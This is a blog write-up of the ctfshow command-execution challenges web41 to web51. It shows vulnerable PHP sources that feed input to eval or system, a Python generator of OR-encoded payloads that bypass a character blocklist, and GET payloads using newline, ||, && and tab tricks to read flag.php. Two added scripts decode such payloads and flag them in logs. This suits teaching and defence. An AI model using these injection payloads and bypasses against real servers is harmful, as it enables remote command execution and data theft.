ctfshow Web Basics - Command Execution 41-50


web41

This one had me stuck for a long time; special thanks to 傅师傅 for the guidance.

Take a look at the challenge source:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date:   2020-09-05 20:31:22
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show

*/

if(isset($_POST['c'])){
    $c = $_POST['c'];
    if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>

As you can see, a great deal is filtered, but ( ) and | are not, so we bypass the filter with the bitwise OR operation.

Here is the script:

import re
import urllib.parse

import requests

# The same blocklist as the challenge; re.I makes [a-z] cover upper case too.
BLOCKLIST = re.compile(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-', re.I)

# For every printable target byte k, find two bytes i and j that both pass the
# blocklist and satisfy i | j == k. The first pair found is kept, and the whole
# table is also written to a file for reference.
table = {}
with open('web或运算绕过.txt', 'w') as a:
    for i in range(126):
        for j in range(126):
            k = i | j
            if 32 <= k <= 126 and BLOCKLIST.search(chr(i) + chr(j)) is None:
                a.write('{} %{:02x} %{:02x}\n'.format(chr(k), i, j))
                table.setdefault(chr(k), ('%{:02x}'.format(i), '%{:02x}'.format(j)))


def encode(word):
    """Turn `word` into ("..."|"...") so that PHP's string OR reproduces it."""
    left = right = ''
    for ch in word:
        i, j = table[ch]
        left += i
        right += j
    return '("' + left + '"|"' + right + '")'


url = input("[+]请输入url:")
while True:
    function = input('[+]:输入你的function:')
    command = input("[+] 输入你的command:")
    # ("function")("command") is a callable string, so eval("echo($c);")
    # ends up calling function(command) and echoing its return value.
    param = encode(function) + encode(command)
    data = {'c': urllib.parse.unquote(param)}
    res = requests.post(url=url, data=data)
    print(res.text)

Key points:

1. ('function')('command') inside eval("echo($c);") calls the function and prints the command output.

2. The bitwise OR lets you get past the filtered characters.

3. Payloads that contain a carriage return don't seem to work directly in HackBar; another method is needed, reason unknown.
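To see what the blocklist misses, here is an added detection-side example (not the original script): it emulates PHP's string bitwise OR on each ("..."|"...") group, so a log reviewer or WAF can recover the function and command that the raw-byte regex never sees. The sample payload is constructed for "system" and "ls"; the 0x0d byte it needs for the 'm' is the kind of carriage return that point 3 ran into.

```python
import re
import urllib.parse

# The web41 blocklist. It inspects the raw bytes of the POST parameter, so it
# never sees the characters that PHP's string OR produces at eval() time.
RAW_FILTER = re.compile(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-', re.I)

# One ("left"|"right") group as emitted by the generator script above.
OR_GROUP = re.compile(r'\("([^"]*)"\|"([^"]*)"\)')


def php_string_or(left, right):
    """Emulate PHP's | on two strings: byte-wise OR. PHP keeps the tail of the
    longer operand unchanged, which is the same as OR-ing it with NUL bytes."""
    n = max(len(left), len(right))
    left, right = left.ljust(n, '\0'), right.ljust(n, '\0')
    return ''.join(chr(ord(a) | ord(b)) for a, b in zip(left, right))


def resolve_or_groups(param):
    """Return the plaintext of every ("..."|"...") group in the payload."""
    return [php_string_or(a, b) for a, b in OR_GROUP.findall(param)]


def passes_raw_filter(text):
    return RAW_FILTER.search(text) is None


def inspect(param):
    """Compare what the blocklist sees with what eval() will actually run."""
    decoded = resolve_or_groups(param)
    return {
        'raw_filter_passed': passes_raw_filter(param),
        'decoded_tokens': decoded,
        'decoded_filter_passed': all(passes_raw_filter(t) for t in decoded),
    }


# Constructed sample: the groups the generator produces for the function
# "system" and the command "ls" (each letter is a control byte OR 0x60 '`').
SAMPLE = urllib.parse.unquote(
    '("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")'  # -> "system"
    '("%0c%13"|"%60%60")'                          # -> "ls"
)
```

Running inspect(SAMPLE) shows the raw filter passing while the decoded tokens would be rejected, which is the gap a request-time check has to close.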

web42

Source:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

As you can see, both standard output and error output are redirected into the black hole (/dev/null), so no output comes back.

Solution 1:

payload ?c=cat flag.php%0a (a newline terminates the command directly)

Solution 2:

payload ?c=cat flag.php; (separate the commands with a semicolon)

web43

Source:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

We find that ; is banned.

So use && or ||. && runs the second command only after the first one succeeds,

so Solution 1:

payload ?c=tac *%26%26  Note: remember to URL-encode (& becomes %26).

Solution 2:

payload ?c=tac * %0a

payload ?c=nl * %0a

web44

Source:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:32:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

Much the same as above.

web45

Source:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:35:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

Spaces are filtered.

Tricks for bypassing a space:

1. ${IFS} (but it can't be written as $IFS)
2. $IFS$9
3. %09
4. <

So the two solutions are mostly the same as above:

payload ?c=tac%09*%0a

web46

Source:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:50:19
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

This time digits are filtered as well (along with $ and *).

It doesn't matter; same as above:

payload ?c=nl<fla''g.php%0a

web47

Source:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

Nothing much changes; same as above.

web48-49

Same as above.

web50-51

Source:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

As you can see, *, %09 and %26 are gone too, but nl< together with || still gets through. Note: nl can't be used with * or ? here.

So payload ?c=nl<fla''g.php%7C%7C
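As an added detection-side example (not from the original post), the following Python normalizes the c parameter the way the challenge regexes from web42 to web51 never do: it URL-decodes it, collapses the fla''g quote split and the ${IFS}/$IFS$9 space substitutes, and then flags the separators (%0a, ;, %26%26, %7C%7C, %09, <) that end the command before the >/dev/null 2>&1 suffix. The access-log lines are constructed from the payloads in this writeup.

```python
import re
import urllib.parse

# Separators that terminate the injected command before " >/dev/null 2>&1".
SEPARATORS = {
    '\n': 'newline (%0a)',
    ';': 'semicolon',
    '&&': 'and-list (%26%26)',
    '||': 'or-list (%7C%7C)',
    '\t': 'tab (%09)',
    '<': 'input redirection',
}
IFS_RE = re.compile(r'\$\{?IFS\}?(\$\d)?')  # ${IFS} and $IFS$9 stand in for a space
KEYWORDS = ('flag', 'cat', 'tac', 'nl')

def normalize(raw_c):
    """Undo URL encoding, empty-quote splitting and IFS tricks before matching."""
    c = urllib.parse.unquote(raw_c)
    c = re.sub(r"''|\"\"", '', c)  # fla''g.php -> flag.php
    c = IFS_RE.sub(' ', c)          # tac${IFS}flag.php -> tac flag.php
    return c

def analyse(raw_c):
    """Report the separators and banned keywords visible after normalization."""
    c = normalize(raw_c)
    return {
        'normalized': c,
        'separators': [name for tok, name in SEPARATORS.items() if tok in c],
        'keywords': [k for k in KEYWORDS if k in c.lower()],
    }

# Constructed access-log lines carrying the payloads from this writeup.
LOG_LINES = [
    '10.0.0.5 - - [05/Sep/2020:22:40:07 +0800] "GET /?c=cat%20flag.php%0a HTTP/1.1" 200 512',
    '10.0.0.5 - - [05/Sep/2020:22:41:10 +0800] "GET /?c=tac%20*%26%26 HTTP/1.1" 200 512',
    '10.0.0.5 - - [05/Sep/2020:22:42:33 +0800] "GET /?c=nl%3Cfla%27%27g.php%7C%7C HTTP/1.1" 200 512',
    '10.0.0.5 - - [05/Sep/2020:22:43:01 +0800] "GET /?c=ls HTTP/1.1" 200 128',
]
QUERY_RE = re.compile(r'"GET /\?c=(\S+) HTTP/1\.[01]"')

def scan(lines):
    """Return (raw_c, report) for every request that trips the analysis."""
    hits = []
    for line in lines:
        m = QUERY_RE.search(line)
        report = analyse(m.group(1)) if m else None
        if report and (report['separators'] or report['keywords']):
            hits.append((m.group(1), report))
    return hits
```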


Author: Rolemee
Copyright notice: unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit Rolemee when reposting!